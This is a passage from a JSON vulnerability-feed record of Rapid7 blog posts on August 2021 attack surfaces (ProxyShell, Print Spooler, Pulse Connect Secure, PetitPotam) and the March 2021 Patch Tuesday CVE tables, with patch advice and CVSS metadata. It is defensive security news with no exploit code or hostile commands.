downloaded any files.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-02T19:53:28", "type": "rapid7blog", "title": "Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2021-03-02T19:53:28", "id": "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "href": "https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-13T12:49:58", "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | 